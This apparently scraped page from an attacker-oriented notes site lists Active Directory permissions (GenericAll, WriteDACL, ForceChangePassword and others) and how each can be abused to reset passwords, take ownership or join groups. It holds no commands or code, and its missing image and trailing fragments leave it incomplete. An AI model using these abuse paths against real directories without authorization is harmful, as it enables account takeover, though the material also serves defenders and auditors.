ACLs/ACEs
Active Directory objects such as users and groups are securable objects and DACL/ACEs define who can read/modify those objects (i.e change account name, reset password, etc).
Last updated
Active Directory objects such as users and groups are securable objects and DACL/ACEs define who can read/modify those objects (i.e change account name, reset password, etc).
Last updated
Some of the Active Directory object permissions and types that we as attackers are interested in:
GenericAll - full rights to the object (add users to a group or reset user's password)
GenericWrite - update object's attributes (i.e logon script)
WriteOwner - change object owner to attacker controlled user take over the object
WriteDACL - modify object's ACEs and give attacker full control right over the object
AllExtendedRights - ability to add user to a group or reset password
ForceChangePassword - ability to change user's password
Self (Self-Membership) - ability to add yourself to a group
The picture above is the example of enumerating ACLs in the Active Directory, here is the explaination:
Object (User) target.
The user that have access to that object
The access tipe is "GenericAll" mean to excessive.
(GenericAll, ForceChangePassword, AllExtendedRight)
(GenericAll, GenericWrite)
Reference: